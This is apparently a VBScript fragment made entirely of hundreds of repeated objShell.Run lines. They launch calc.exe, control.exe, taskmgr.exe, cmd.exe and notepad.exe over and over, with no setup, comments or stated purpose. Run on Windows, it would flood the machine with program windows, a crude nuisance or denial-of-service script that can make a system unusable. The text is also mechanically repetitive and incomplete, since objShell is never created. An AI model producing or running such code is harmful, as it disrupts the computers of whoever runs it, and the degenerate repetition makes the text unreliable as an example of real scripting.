objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
